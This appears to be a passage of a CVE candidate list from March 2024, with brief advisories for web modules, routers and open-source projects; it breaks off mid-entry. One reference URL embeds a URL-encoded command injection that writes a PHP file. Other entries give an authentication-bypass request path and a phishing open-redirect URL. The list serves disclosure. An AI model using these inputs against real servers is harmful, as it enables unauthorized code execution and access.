CVE    2024    28389    Candidate    SQL injection vulnerability in KnowBand spinwheel v.3.0.3 and before allows a remote attacker to gain escalated privileges and obtain sensitive information via the SpinWheelFrameSpinWheelModuleFrontController::sendEmail() method.    MISC:https://security.friendsofpresta.org/modules/2024/03/12/spinwheel.html    Assigned (20240308)
CVE    2024    28388    Candidate    SQL injection vulnerability in SunnyToo stproductcomments module for PrestaShop v.1.0.5 and before, allows a remote attacker to escalate privileges and obtain sensitive information via the StProductCommentClass::getListcomments method.    MISC:https://security.friendsofpresta.org/modules/2024/03/12/stproductcomments.html    Assigned (20240308)
CVE    2024    28387    Candidate    An issue in axonaut v.3.1.23 and before allows a remote attacker to obtain sensitive information via the log.txt component.    MISC:https://axonaut.com/integration/detail/prestashop   |   MISC:https://security.friendsofpresta.org/modules/2024/03/19/axonaut.html    Assigned (20240308)
CVE    2024    28386    Candidate    An issue in Home-Made.io fastmagsync v.1.7.51 and before allows a remote attacker to execute arbitrary code via the getPhpBin() component.    MISC:http://fastmagsync.com   |   MISC:http://home-madeio.com   |   MISC:https://reference1.example.com/modules/fastmagsync/crons/cron_mutualise_job_queue.php?hosting=.%20%26%20%20echo%20%27%3C%3Fphp%20echo%20%2242ovh%22%3B%27%20%3E%20a.php%3B%23&syncway=tofastmag   |   MISC:https://security.friendsofpresta.org/modules/2024/03/19/fastmagsync.html   |   MISC:https://www.home-made.io/module-fastmag-sync-prestashop/    Assigned (20240308)
CVE    2024    28383    Candidate    Tenda AX12 v1.0 v22.03.01.16 was discovered to contain a stack overflow via the ssid parameter in the sub_431CF0 function.    MISC:https://github.com/cvdyfbwa/IoT-Tenda-Router/blob/main/sub_431CF0.md    Assigned (20240308)
CVE    2024    28354    Candidate    There is a command injection vulnerability in the TRENDnet TEW-827DRU router with firmware version 2.10B01. An attacker can inject commands into the post request parameters usapps.@smb[%d].username in the apply.cgi interface, thereby gaining root shell privileges.    MISC:https://warp-desk-89d.notion.site/TEW-827DRU-c732df50b2454ecaa5451b02f3adda6a    Assigned (20240308)
CVE    2024    28353    Candidate    There is a command injection vulnerability in the TRENDnet TEW-827DRU router with firmware version 2.10B01. An attacker can inject commands into the post request parameters usapps.config.smb_admin_name in the apply.cgi interface, thereby gaining root shell privileges.    MISC:https://warp-desk-89d.notion.site/TEW-827DRU-5c40fb20572148f0b00f329d69273791    Assigned (20240308)
CVE    2024    28340    Candidate    An information leak in the currentsetting.htm component of Netgear CBR40 2.5.0.28, Netgear CBK40 2.5.0.28, and Netgear CBK43 2.5.0.28 allows attackers to obtain sensitive information without any authentication required.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/Netgear%20CBR40%5CCBK40%5CCBK43/Info%20Leak%20in%20Netgear-CBR40%E3%80%81CBK40%E3%80%81CBK43%20Router%EF%BC%88currentsetting.htm%EF%BC%89.md   |   MISC:https://www.netgear.com/about/security/    Assigned (20240308)
CVE    2024    28339    Candidate    An information leak in the debuginfo.htm component of Netgear CBR40 2.5.0.28, Netgear CBK40 2.5.0.28, and Netgear CBK43 2.5.0.28 allows attackers to obtain sensitive information without any authentication required.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/Netgear%20CBR40%5CCBK40%5CCBK43/Info%20Leak%20in%20Netgear-CBR40%E3%80%81CBK40%E3%80%81CBK43%20Router%EF%BC%88debuginfo.htm%EF%BC%89.md   |   MISC:https://www.netgear.com/about/security/    Assigned (20240308)
CVE    2024    28338    Candidate    A login bypass in TOTOLINK A8000RU V7.1cu.643_B20200521 allows attackers to login to Administrator accounts via providing a crafted session cookie.    MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A8000RU/TOTOlink%20A8000RU%20login%20bypass.md    Assigned (20240308)
CVE    2024    28323    Candidate    The bwdates-report-result.php file in Phpgurukul User Registration & Login and User Management System 3.1 contains a potential security vulnerability related to user input validation. The script retrieves user-provided date inputs without proper validation, making it susceptible to SQL injection attacks.    MISC:https://packetstormsecurity.com/files/177168/User-Registration-And-Login-And-User-Management-System-3.1-SQL-Injection.html    Assigned (20240308)
CVE    2024    2832    Candidate    A vulnerability classified as problematic was found in Campcodes Online Shopping System 1.0. This vulnerability affects unknown code of the file /offersmail.php. The manipulation of the argument email leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257752.    MISC:VDB-257752 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257752   |   MISC:VDB-257752 | Campcodes Online Shopping System offersmail.php cross site scripting   |   URL:https://vuldb.com/?id.257752   |   MISC:https://github.com/comeony/vuln_report/blob/main/Online%20Shopping%20System%20-%20vuln%201.pdf   |   URL:https://github.com/comeony/vuln_report/blob/main/Online%20Shopping%20System%20-%20vuln%201.pdf    Assigned (20240322)
CVE    2024    28319    Candidate    gpac 2.3-DEV-rev921-g422b78ecf-master was discovered to contain an out of boundary read vulnerability via gf_dash_setup_period media_tools/dash_client.c:6374    MISC:https://github.com/gpac/gpac/issues/2763    Assigned (20240308)
CVE    2024    28318    Candidate    gpac 2.3-DEV-rev921-g422b78ecf-master was discovered to contain an out of boundary write vulnerability via swf_get_string at scene_manager/swf_parse.c:325    MISC:https://github.com/gpac/gpac/issues/2764    Assigned (20240308)
CVE    2024    28303    Candidate    Open Source Medicine Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the date parameter at /admin/reports/index.php.    MISC:https://github.com/onurkarasalihoglu/vulnerability-disclosures/blob/main/omos-sql-injection.md   |   MISC:https://github.com/onurkarasalihoglu/vulnerability-disclosures/blob/main/omos_sqli_exploit.py    Assigned (20240308)
CVE    2024    28286    Candidate    In mz-automation libiec61850 v1.4.0, a NULL Pointer Dereference was detected in the mmsServer_handleFileCloseRequest.c function of src/mms/iso_mms/server/mms_file_service.c. The vulnerability manifests as SEGV and causes the application to crash.    MISC:https://github.com/mz-automation/libiec61850/issues/496    Assigned (20240308)
CVE    2024    28283    Candidate    There is a stack-based buffer overflow vulnerability in the pc_change_act function in Linksys E1000 router firmware version v.2.1.03 and before, leading to remote code execution.    MISC:https://d05004.notion.site/Linksys-E1000-BOF-37b98eec45ea4fc991b9b5bea3db091d?pvs=4    Assigned (20240308)
CVE    2024    2828    Candidate    A vulnerability, which was classified as critical, was found in lakernote EasyAdmin up to 20240315. Affected is the function thumbnail of the file src/main/java/com/laker/admin/module/sys/controller/IndexController.java. The manipulation of the argument url leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 23165d8cb569048c531150f194fea39f8800b8d5. It is recommended to apply a patch to fix this issue. VDB-257718 is the identifier assigned to this vulnerability.    MISC:VDB-257718 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257718   |   MISC:VDB-257718 | lakernote EasyAdmin IndexController.java thumbnail server-side request forgery   |   URL:https://vuldb.com/?id.257718   |   MISC:https://gitee.com/lakernote/easy-admin/commit/23165d8cb569048c531150f194fea39f8800b8d5   |   URL:https://gitee.com/lakernote/easy-admin/commit/23165d8cb569048c531150f194fea39f8800b8d5   |   MISC:https://gitee.com/lakernote/easy-admin/issues/I98YSR   |   URL:https://gitee.com/lakernote/easy-admin/issues/I98YSR    Assigned (20240322)
CVE    2024    2827    Candidate    A vulnerability, which was classified as critical, has been found in lakernote EasyAdmin up to 20240315. This issue affects some unknown processing of the file /ureport/designer/saveReportFile. The manipulation leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257717 was assigned to this vulnerability.    MISC:VDB-257717 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257717   |   MISC:VDB-257717 | lakernote EasyAdmin saveReportFile server-side request forgery   |   URL:https://vuldb.com/?id.257717   |   MISC:https://gitee.com/lakernote/easy-admin/issues/I98ZTA   |   URL:https://gitee.com/lakernote/easy-admin/issues/I98ZTA    Assigned (20240322)
CVE    2024    2826    Candidate    A vulnerability classified as problematic was found in lakernote EasyAdmin up to 20240315. This vulnerability affects unknown code of the file /ureport/designer/saveReportFile. The manipulation leads to xml external entity reference. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257716.    MISC:VDB-257716 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257716   |   MISC:VDB-257716 | lakernote EasyAdmin saveReportFile xml external entity reference   |   URL:https://vuldb.com/?id.257716   |   MISC:https://gitee.com/lakernote/easy-admin/issues/I98ZTA   |   URL:https://gitee.com/lakernote/easy-admin/issues/I98ZTA    Assigned (20240322)
CVE    2024    28255    Candidate    OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.    
MISC:https://github.com/open-metadata/OpenMetadata/blob/e2043a3f31312ebb42391d6c93a67584d798de52/openmetadata-service/src/main/java/org/openmetadata/service/security/JwtFilter.java#L111   |   URL:https://github.com/open-metadata/OpenMetadata/blob/e2043a3f31312ebb42391d6c93a67584d798de52/openmetadata-service/src/main/java/org/openmetadata/service/security/JwtFilter.java#L111   |   MISC:https://github.com/open-metadata/OpenMetadata/blob/e2043a3f31312ebb42391d6c93a67584d798de52/openmetadata-service/src/main/java/org/openmetadata/service/security/JwtFilter.java#L113   |   URL:https://github.com/open-metadata/OpenMetadata/blob/e2043a3f31312ebb42391d6c93a67584d798de52/openmetadata-service/src/main/java/org/openmetadata/service/security/JwtFilter.java#L113   |   MISC:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84   |   URL:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84    Assigned (20240307)
CVE    2024    28254    Candidate    OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `AlertUtil::validateExpression` method evaluates an SpEL expression using `getValue` which by default uses the `StandardEvaluationContext`, allowing the expression to reach and interact with Java classes such as `java.lang.Runtime`, leading to Remote Code Execution. The `/api/v1/events/subscriptions/validation/condition/<expression>` endpoint passes user-controlled data to `AlertUtil::validateExpression`, allowing authenticated (non-admin) users to execute arbitrary system commands on the underlying operating system. In addition, there is a missing authorization check since `Authorizer.authorize()` is never called in the affected path and, therefore, any authenticated non-admin user is able to trigger this endpoint and evaluate arbitrary SpEL expressions leading to arbitrary command execution. This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query and is also tracked as `GHSL-2023-235`. This issue may lead to Remote Code Execution and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability.    
MISC:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection   |   URL:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection   |   MISC:https://github.com/open-metadata/OpenMetadata/blob/84054a85d3478e3e3795fe92daa633ec11c9d6d9/openmetadata-service/src/main/java/org/openmetadata/service/events/subscription/AlertUtil.java#L101   |   URL:https://github.com/open-metadata/OpenMetadata/blob/84054a85d3478e3e3795fe92daa633ec11c9d6d9/openmetadata-service/src/main/java/org/openmetadata/service/events/subscription/AlertUtil.java#L101   |   MISC:https://github.com/open-metadata/OpenMetadata/blob/84054a85d3478e3e3795fe92daa633ec11c9d6d9/openmetadata-service/src/main/java/org/openmetadata/service/events/subscription/AlertUtil.java#L108   |   URL:https://github.com/open-metadata/OpenMetadata/blob/84054a85d3478e3e3795fe92daa633ec11c9d6d9/openmetadata-service/src/main/java/org/openmetadata/service/events/subscription/AlertUtil.java#L108   |   MISC:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-j86m-rrpr-g8gw   |   URL:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-j86m-rrpr-g8gw   |   MISC:https://github.com/spring-projects/spring-framework/blob/4e2d3573189b7c0afce62bce29cd915de4077f56/spring-expression/src/main/java/org/springframework/expression/spel/standard/SpelExpression.java#L106   |   URL:https://github.com/spring-projects/spring-framework/blob/4e2d3573189b7c0afce62bce29cd915de4077f56/spring-expression/src/main/java/org/springframework/expression/spel/standard/SpelExpression.java#L106    Assigned (20240307)
CVE    2024    28253    Candidate    OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. `CompiledRule::validateExpression` is also called from `PolicyRepository.prepare`. `prepare()` is called from `EntityRepository.prepareInternal()` which, in turn, gets called from `EntityResource.createOrUpdate()`. Note that even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and therefore after the SpEL expression has been evaluated. In order to reach this method, an attacker can send a PUT request to `/api/v1/policies` which gets handled by `PolicyResource.createOrUpdate()`. This vulnerability was discovered with the help of CodeQL's Expression language injection (Spring) query and is also tracked as `GHSL-2023-252`. This issue may lead to Remote Code Execution and has been addressed in version 1.3.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.    
MISC:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection   |   URL:https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection   |   MISC:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693   |   URL:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693   |   MISC:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219   |   URL:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219   |   MISC:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/policies/PolicyResource.java#L365   |   URL:https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/policies/PolicyResource.java#L365   |   MISC:https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/PolicyRepository.java#L113   |   URL:https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/PolicyRepository.java#L113   |   MISC:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-7vf4-x5m2-r6gr   |   URL:https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-7vf4-x5m2-r6gr    Assigned (20240307)
CVE    2024    28252    Candidate    CoreWCF is a port of the service side of Windows Communication Foundation (WCF) to .NET Core. If you have a NetFraming based CoreWCF service, extra system resources could be consumed by connections being left established instead of closing or aborting them. There are two scenarios when this can happen. When a client establishes a connection to the service and sends no data, the service will wait indefinitely for the client to initiate the NetFraming session handshake. Additionally, once a client has established a session, if the client doesn't send any requests for the period of time configured in the binding ReceiveTimeout, the connection is not properly closed as part of the session being aborted. The bindings affected by this behavior are NetTcpBinding, NetNamedPipeBinding, and UnixDomainSocketBinding. Only NetTcpBinding has the ability to accept non-local connections. The currently supported versions of CoreWCF are v1.4.x and v1.5.x. The fix can be found in v1.4.2 and v1.5.2 of the CoreWCF packages. Users are advised to upgrade. There are no workarounds for this issue.    MISC:https://github.com/CoreWCF/CoreWCF/issues/1345   |   URL:https://github.com/CoreWCF/CoreWCF/issues/1345   |   MISC:https://github.com/CoreWCF/CoreWCF/security/advisories/GHSA-32jq-mv89-5rx7   |   URL:https://github.com/CoreWCF/CoreWCF/security/advisories/GHSA-32jq-mv89-5rx7    Assigned (20240307)
CVE    2024    28251    Candidate    Querybook is a Big Data Querying UI, combining collocated table metadata and a simple notebook interface. Querybook's datadocs functionality works by using a Websocket Server. The client talks to this WSS whenever updating/deleting/reading any cells as well as for watching the live status of query executions. Currently the CORS setting allows all origins, which could result in cross-site websocket hijacking and allow attackers to read/edit/remove datadocs of the user. This issue has been addressed in version 3.32.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/pinterest/querybook/pull/1425   |   URL:https://github.com/pinterest/querybook/pull/1425   |   MISC:https://github.com/pinterest/querybook/security/advisories/GHSA-5349-j4c9-x767   |   URL:https://github.com/pinterest/querybook/security/advisories/GHSA-5349-j4c9-x767    Assigned (20240307)
CVE    2024    28250    Candidate    Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Starting in version 1.14.0 and prior to versions 1.14.8 and 1.15.2, in Cilium clusters with WireGuard enabled and traffic matching Layer 7 policies, WireGuard-eligible traffic that is sent between a node's Envoy proxy and pods on other nodes is sent unencrypted and WireGuard-eligible traffic that is sent between a node's DNS proxy and pods on other nodes is sent unencrypted. This issue has been resolved in Cilium 1.14.8 and 1.15.2 in native routing mode (`routingMode=native`) and in Cilium 1.14.4 in tunneling mode (`routingMode=tunnel`). Note that in tunneling mode, `encryption.wireguard.encapsulate` must be set to `true`. There is no known workaround for this issue.    MISC:https://github.com/cilium/cilium/releases/tag/v1.13.13   |   URL:https://github.com/cilium/cilium/releases/tag/v1.13.13   |   MISC:https://github.com/cilium/cilium/releases/tag/v1.14.8   |   URL:https://github.com/cilium/cilium/releases/tag/v1.14.8   |   MISC:https://github.com/cilium/cilium/releases/tag/v1.15.2   |   URL:https://github.com/cilium/cilium/releases/tag/v1.15.2   |   MISC:https://github.com/cilium/cilium/security/advisories/GHSA-v6q2-4qr3-5cw6   |   URL:https://github.com/cilium/cilium/security/advisories/GHSA-v6q2-4qr3-5cw6    Assigned (20240307)
CVE    2024    2825    Candidate    A vulnerability classified as critical has been found in lakernote EasyAdmin up to 20240315. This affects an unknown part of the file /ureport/designer/saveReportFile. The manipulation of the argument file leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257715.    MISC:VDB-257715 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257715   |   MISC:VDB-257715 | lakernote EasyAdmin saveReportFile path traversal   |   URL:https://vuldb.com/?id.257715   |   MISC:https://gitee.com/lakernote/easy-admin/issues/I98ZTA   |   URL:https://gitee.com/lakernote/easy-admin/issues/I98ZTA    Assigned (20240322)
CVE    2024    28249    Candidate    Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.13.13, 1.14.8, and 1.15.2, in Cilium clusters with IPsec enabled and traffic matching Layer 7 policies, IPsec-eligible traffic between a node's Envoy proxy and pods on other nodes is sent unencrypted and IPsec-eligible traffic between a node's DNS proxy and pods on other nodes is sent unencrypted. This issue has been resolved in Cilium 1.15.2, 1.14.8, and 1.13.13. There is no known workaround for this issue.    MISC:https://github.com/cilium/cilium/releases/tag/v1.13.13   |   URL:https://github.com/cilium/cilium/releases/tag/v1.13.13   |   MISC:https://github.com/cilium/cilium/releases/tag/v1.14.8   |   URL:https://github.com/cilium/cilium/releases/tag/v1.14.8   |   MISC:https://github.com/cilium/cilium/releases/tag/v1.15.2   |   URL:https://github.com/cilium/cilium/releases/tag/v1.15.2   |   MISC:https://github.com/cilium/cilium/security/advisories/GHSA-j89h-qrvr-xc36   |   URL:https://github.com/cilium/cilium/security/advisories/GHSA-j89h-qrvr-xc36    Assigned (20240307)
CVE    2024    28248    Candidate    Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Starting in version 1.13.9 and prior to versions 1.13.13, 1.14.8, and 1.15.2, Cilium's HTTP policies are not consistently applied to all traffic in the scope of the policies, leading to HTTP traffic being incorrectly and intermittently forwarded when it should be dropped. This issue has been patched in Cilium 1.15.2, 1.14.8, and 1.13.13. There are no known workarounds for this issue.    MISC:https://docs.cilium.io/en/stable/security/policy/language/#http   |   URL:https://docs.cilium.io/en/stable/security/policy/language/#http   |   MISC:https://github.com/cilium/cilium/releases/tag/v1.13.13   |   URL:https://github.com/cilium/cilium/releases/tag/v1.13.13   |   MISC:https://github.com/cilium/cilium/releases/tag/v1.14.8   |   URL:https://github.com/cilium/cilium/releases/tag/v1.14.8   |   MISC:https://github.com/cilium/cilium/releases/tag/v1.15.2   |   URL:https://github.com/cilium/cilium/releases/tag/v1.15.2   |   MISC:https://github.com/cilium/cilium/security/advisories/GHSA-68mj-9pjq-mc85   |   URL:https://github.com/cilium/cilium/security/advisories/GHSA-68mj-9pjq-mc85    Assigned (20240307)
CVE    2024    28246    Candidate    KaTeX is a JavaScript library for TeX math rendering on the web. Code that uses KaTeX's `trust` option, specifically that provides a function to blacklist certain URL protocols, can be fooled by URLs in malicious inputs that use uppercase characters in the protocol. In particular, this can allow for malicious input to generate `javascript:` links in the output, even if the `trust` function tries to forbid this protocol via `trust: (context) => context.protocol !== 'javascript'`. Upgrade to KaTeX v0.16.10 to remove this vulnerability.    MISC:https://github.com/KaTeX/KaTeX/commit/fc5af64183a3ceb9be9d1c23a275999a728593de   |   URL:https://github.com/KaTeX/KaTeX/commit/fc5af64183a3ceb9be9d1c23a275999a728593de   |   MISC:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-3wc5-fcw2-2329   |   URL:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-3wc5-fcw2-2329    Assigned (20240307)
CVE    2024    28245    Candidate    KaTeX is a JavaScript library for TeX math rendering on the web. KaTeX users who render untrusted mathematical expressions could encounter malicious input using `\includegraphics` that runs arbitrary JavaScript, or generate invalid HTML. Upgrade to KaTeX v0.16.10 to remove this vulnerability.    MISC:https://github.com/KaTeX/KaTeX/commit/c5897fcd1f73da9612a53e6b5544f1d776e17770   |   URL:https://github.com/KaTeX/KaTeX/commit/c5897fcd1f73da9612a53e6b5544f1d776e17770   |   MISC:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-f98w-7cxr-ff2h   |   URL:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-f98w-7cxr-ff2h    Assigned (20240307)
CVE    2024    28244    Candidate    KaTeX is a JavaScript library for TeX math rendering on the web. KaTeX users who render untrusted mathematical expressions could encounter malicious input using `\def` or `\newcommand` that causes a near-infinite loop, despite setting `maxExpand` to avoid such loops. KaTeX supports an option named maxExpand which aims to prevent infinitely recursive macros from consuming all available memory and/or triggering a stack overflow error. Unfortunately, support for "Unicode (sub|super)script characters" allows an attacker to bypass this limit. Each sub/superscript group instantiated a separate Parser with its own limit on macro executions, without inheriting the current count of macro executions from its parent. This has been corrected in KaTeX v0.16.10.    MISC:https://github.com/KaTeX/KaTeX/commit/085e21b5da05414efefa932570e7201a7c70e5b2   |   URL:https://github.com/KaTeX/KaTeX/commit/085e21b5da05414efefa932570e7201a7c70e5b2   |   MISC:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-cvr6-37gx-v8wc   |   URL:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-cvr6-37gx-v8wc    Assigned (20240307)
CVE    2024    28243    Candidate    KaTeX is a JavaScript library for TeX math rendering on the web. KaTeX users who render untrusted mathematical expressions could encounter malicious input using `\edef` that causes a near-infinite loop, despite setting `maxExpand` to avoid such loops. This can be used as an availability attack, where e.g. a client rendering another user's KaTeX input will be unable to use the site due to memory overflow, tying up the main thread, or stack overflow. Upgrade to KaTeX v0.16.10 to remove this vulnerability.    MISC:https://github.com/KaTeX/KaTeX/commit/e88b4c357f978b1bca8edfe3297f0aa309bcbe34   |   URL:https://github.com/KaTeX/KaTeX/commit/e88b4c357f978b1bca8edfe3297f0aa309bcbe34   |   MISC:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-64fm-8hw2-v72w   |   URL:https://github.com/KaTeX/KaTeX/security/advisories/GHSA-64fm-8hw2-v72w    Assigned (20240307)
CVE    2024    28242    Candidate    Discourse is an open source platform for community discussion. In affected versions an attacker can learn that secret categories exist when they have backgrounds set. The issue is patched in the latest stable, beta and tests-passed version of Discourse. Users are advised to upgrade. Users unable to upgrade should temporarily remove category backgrounds.    MISC:https://github.com/discourse/discourse/commit/b425fbc2a28341a5627928f963519006712c3d39   |   URL:https://github.com/discourse/discourse/commit/b425fbc2a28341a5627928f963519006712c3d39   |   MISC:https://github.com/discourse/discourse/security/advisories/GHSA-c7q7-7f6q-2c23   |   URL:https://github.com/discourse/discourse/security/advisories/GHSA-c7q7-7f6q-2c23    Assigned (20240307)
CVE    2024    2824    Candidate    A vulnerability was found in Matthias-Wandel jhead 3.08 and classified as critical. This issue affects the function PrintFormatNumber of the file exif.c. The manipulation leads to heap-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257711.    MISC:VDB-257711 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257711   |   MISC:VDB-257711 | Matthias-Wandel jhead exif.c PrintFormatNumber heap-based overflow   |   URL:https://vuldb.com/?id.257711   |   MISC:https://github.com/Matthias-Wandel/jhead/files/14613084/poc.zip   |   URL:https://github.com/Matthias-Wandel/jhead/files/14613084/poc.zip   |   MISC:https://github.com/Matthias-Wandel/jhead/issues/84   |   URL:https://github.com/Matthias-Wandel/jhead/issues/84    Assigned (20240322)
CVE    2024    28239    Candidate    Directus is a real-time API and App dashboard for managing SQL database content. The authentication API has a `redirect` parameter that can be exploited as an open redirect vulnerability as the user tries to log in via the API URL. There's a redirect that is done after successful login via the Auth API GET request to `directus/auth/login/google?redirect=http://malicious-fishing-site.com`. While credentials don't seem to be passed to the attacker site, the user can be phished into clicking a legitimate Directus site and be taken to a malicious site made to look like an error message "Your password needs to be updated" to phish out the current password. Users who log in via OAuth2 into Directus may be at risk. This issue has been addressed in version 10.10.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://docs.directus.io/reference/authentication.html#login-using-sso-providers   |   URL:https://docs.directus.io/reference/authentication.html#login-using-sso-providers   |   MISC:https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203   |   URL:https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203   |   MISC:https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p   |   URL:https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p    Assigned (20240307)
CVE    2024    28238    Candidate    Directus is a real-time API and App dashboard for managing SQL database content. When reaching the /files page, a JWT is passed via GET request. Inclusion of session tokens in URLs poses a security risk as URLs are often logged in various places (e.g., web server logs, browser history). Attackers gaining access to these logs may hijack active user sessions, leading to unauthorized access to sensitive information or actions on behalf of the user. This issue has been addressed in version 10.10.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677   |   URL:https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677    Assigned (20240307)
CVE    2024    28237    Candidate    OctoPrint provides a web interface for controlling consumer 3D printers. OctoPrint versions up until and including 1.9.3 contain a vulnerability that allows malicious admins to configure, or talk a victim with administrator rights into configuring, a webcam snapshot URL which, when tested through the "Test" button included in the web interface, will execute JavaScript code in the victim's browser when attempting to render the snapshot image. An attacker who successfully talked a victim with admin rights into performing a snapshot test with such a crafted URL could use this to retrieve or modify sensitive configuration settings, interrupt prints or otherwise interact with the OctoPrint instance in a malicious way. The vulnerability is patched in version 1.10.0rc3. OctoPrint administrators are strongly advised to thoroughly vet who has admin access to their installation and what settings they modify based on instructions by strangers.    MISC:https://github.com/OctoPrint/OctoPrint/commit/779894c1bc6478332d14bc9ed1006df1354eb517   |   URL:https://github.com/OctoPrint/OctoPrint/commit/779894c1bc6478332d14bc9ed1006df1354eb517   |   MISC:https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-x7mf-wrh9-r76c   |   URL:https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-x7mf-wrh9-r76c    Assigned (20240307)
CVE    2024    28236    Candidate    Vela is a Pipeline Automation (CI/CD) framework built on Linux container technology written in Golang. Vela pipelines can use variable substitution combined with insensitive fields like `parameters`, `image` and `entrypoint` to inject secrets into a plugin/image and — by using common substitution string manipulation — can bypass log masking and expose secrets without the use of the commands block. This unexpected behavior primarily impacts secrets restricted by the "no commands" option. This can lead to unintended use of the secret value, and increased risk of exposing the secret during image execution bypassing log masking. **To exploit this** the pipeline author must be supplying the secrets to a plugin that is designed in such a way that will print those parameters in logs. Plugin parameters are not designed for sensitive values and are often intentionally printed throughout execution for informational/debugging purposes. Parameters should therefore be treated as insensitive. While Vela provides secrets masking, secrets exposure is not entirely solved by the masking process. A docker image (plugin) can easily expose secrets if they are not handled properly, or altered in some way. There is a responsibility on the end-user to understand how values injected into a plugin are used. This is a risk that exists for many CICD systems (like GitHub Actions) that handle sensitive runtime variables. Rather, the greater risk is that users who restrict a secret to the "no commands" option and use image restriction can still have their secret value exposed via substitution tinkering, which turns the image and command restrictions into a false sense of security. This issue has been addressed in version 0.23.2. Users are advised to upgrade. Users unable to upgrade should not provide sensitive values to plugins that can potentially expose them, especially in `parameters` that are not intended to be used for 